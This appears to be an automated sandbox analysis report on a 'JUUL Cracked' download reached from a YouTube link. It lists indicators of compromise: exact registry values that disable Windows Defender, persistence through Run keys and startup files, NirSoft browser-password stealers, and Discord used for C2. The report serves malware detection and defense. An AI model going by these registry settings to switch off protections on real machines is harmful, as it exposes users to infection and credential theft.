hxxps://www[.]youtube[.]com/watch?v=bJxX57PSH_U&t=91s

Analysis

max time kernel
150s
max time network
152s
platform
windows11-21h2_x64
resource
win11-20240412-en
resource tags

arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
submitted
17/04/2024, 14:42

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

https://www.youtube.com/watch?v=bJxX57PSH_U&t=91s

Score

10^/10

evasion persistence spyware stealer trojan upx

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 21 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2718508534-2116753757-2794822388-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718508534-2116753757-2794822388-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	svchost.exe

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/428-993-0x00000223E12F0000-0x00000223E1632000-memory.dmp	WebBrowserPassView
behavioral1/files/0x000100000002abab-1128.dat	WebBrowserPassView

Nirsoft 9 IoCs

resource	yara_rule
behavioral1/memory/428-993-0x00000223E12F0000-0x00000223E1632000-memory.dmp	Nirsoft
behavioral1/files/0x000200000002aba6-1074.dat	Nirsoft
behavioral1/files/0x000100000002abab-1128.dat	Nirsoft
behavioral1/memory/6052-1164-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
behavioral1/files/0x000100000002aba8-1163.dat	Nirsoft
behavioral1/memory/6068-1162-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral1/files/0x000100000002abaa-1182.dat	Nirsoft
behavioral1/memory/3536-1322-0x0000000000400000-0x000000000045B000-memory.dmp	Nirsoft
behavioral1/memory/2216-1329-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager6119005.exe\:Zone.Identifier:$DATA	juul cracked.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager7533373.exe	juul cracked.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager7533373.exe	juul cracked.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager7533373.exe\:Zone.Identifier:$DATA	juul cracked.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager6119005.exe	juul cracked.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager6119005.exe	juul cracked.exe

Executes dropped EXE 26 IoCs

pid	Process
2620	juul cracked.exe
3540	icsys.icn.exe
428	RtkBtManServ.exe
2432	explorer.exe
3284	spoolsv.exe
1400	svchost.exe
5016	spoolsv.exe
5328	bfsvc.exe
5420	juul cracked.exe
5500	icsys.icn.exe
5540	explorer.exe
5820	snuvcdsm.exe
6052	winhlp32.exe
6068	splwow64.exe
6084	hh.exe
2876	xwizard.exe
5568	RtkBtManServ.exe
5784	bfsvc.exe
6128	snuvcdsm.exe
3536	winhlp32.exe
2216	splwow64.exe
5012	hh.exe
5212	juul cracked.exe
5528	icsys.icn.exe
5640	explorer.exe
5172	xwizard.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/6052-1164-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral1/memory/6068-1162-0x0000000000400000-0x000000000041B000-memory.dmp	upx
behavioral1/files/0x000100000002aba9-1157.dat	upx
behavioral1/memory/6052-1154-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral1/files/0x000100000002aba7-1152.dat	upx
behavioral1/memory/3536-1322-0x0000000000400000-0x000000000045B000-memory.dmp	upx
behavioral1/memory/2216-1329-0x0000000000400000-0x000000000041B000-memory.dmp	upx

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO"	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
1	discord.com
100	discord.com
118	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	api64.ipify.org
99	api64.ipify.org
116	api64.ipify.org

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\explorer.exe	explorer.exe
File opened for modification	C:\Windows\SysWOW64\explorer.exe	svchost.exe

Drops file in Windows directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Resources\Themes\icsys.icn	svchost.exe
File opened for modification	C:\Windows\Resources\Themes\icsys.icn.exe	JUUL Cracked.exe
File opened for modification	C:\Windows\Resources\Themes\icsys.icn.exe	JUUL Cracked.exe
File opened for modification	C:\Windows\Resources\Themes\icsys.icn.exe	JUUL Cracked.exe
File opened for modification	\??\c:\windows\resources\themes\explorer.exe	icsys.icn.exe
File opened for modification	\??\c:\windows\resources\spoolsv.exe	explorer.exe
File opened for modification	\??\c:\windows\resources\svchost.exe	spoolsv.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2718508534-2116753757-2794822388-1000_Classes\Local Settings	RtkBtManServ.exe
Key created	\REGISTRY\USER\S-1-5-21-2718508534-2116753757-2794822388-1000_Classes\Local Settings	juul cracked.exe
Key created	\REGISTRY\USER\S-1-5-21-2718508534-2116753757-2794822388-1000_Classes\Local Settings	RtkBtManServ.exe
Key created	\REGISTRY\USER\S-1-5-21-2718508534-2116753757-2794822388-1000_Classes\Local Settings	juul cracked.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\JUUL Cracked.zip:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1712	msedge.exe
1712	msedge.exe
104	msedge.exe
104	msedge.exe
3880	msedge.exe
3880	msedge.exe
4764	identity_helper.exe
4764	identity_helper.exe
1876	msedge.exe
1876	msedge.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
2432	explorer.exe
1400	svchost.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs

pid	Process
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: 33	2840	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2840	AUDIODG.EXE
Token: SeDebugPrivilege	2620	juul cracked.exe
Token: SeDebugPrivilege	428	RtkBtManServ.exe
Token: SeDebugPrivilege	5420	juul cracked.exe
Token: SeDebugPrivilege	5568	RtkBtManServ.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe
104	msedge.exe

Suspicious use of SetWindowsHookEx 36 IoCs

pid	Process
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
1540	JUUL Cracked.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
3540	icsys.icn.exe
2432	explorer.exe
2432	explorer.exe
2432	explorer.exe
3284	spoolsv.exe
3284	spoolsv.exe
3284	spoolsv.exe
1400	svchost.exe
1400	svchost.exe
1400	svchost.exe
5016	spoolsv.exe
5016	spoolsv.exe
5016	spoolsv.exe
5372	JUUL Cracked.exe
5372	JUUL Cracked.exe
5372	JUUL Cracked.exe
5500	icsys.icn.exe
5500	icsys.icn.exe
5500	icsys.icn.exe
5540	explorer.exe
5540	explorer.exe
5540	explorer.exe
4820	JUUL Cracked.exe
4820	JUUL Cracked.exe
4820	JUUL Cracked.exe
5528	icsys.icn.exe
5528	icsys.icn.exe
5528	icsys.icn.exe
5640	explorer.exe
5640	explorer.exe
5640	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 104 wrote to memory of 4420	104	msedge.exe	80
PID 104 wrote to memory of 4420	104	msedge.exe	80
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 4380	104	msedge.exe	81
PID 104 wrote to memory of 1712	104	msedge.exe	82
PID 104 wrote to memory of 1712	104	msedge.exe	82
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83
PID 104 wrote to memory of 3100	104	msedge.exe	83

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=bJxX57PSH_U&t=91s
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9da053cb8,0x7ff9da053cc8,0x7ff9da053cd8
  2⤵
  PID:4420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
  2⤵
  PID:4380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
  2⤵
  PID:3100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:4828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
  2⤵
  PID:2876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:1
  2⤵
  PID:904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:1
  2⤵
  PID:2496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=1816 /prefetch:8
  2⤵
  PID:3348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3880
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5976 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
  2⤵
  PID:1152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
  2⤵
  PID:2984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
  2⤵
  PID:2336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
  2⤵
  PID:3888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2980 /prefetch:8
  2⤵
  PID:1004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2588 /prefetch:1
  2⤵
  PID:2316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6716 /prefetch:1
  2⤵
  PID:4460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6856 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6548 /prefetch:1
  2⤵
  PID:5324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1840,10632974030760435905,12675968359504712119,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6388 /prefetch:1
  2⤵
  PID:5916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
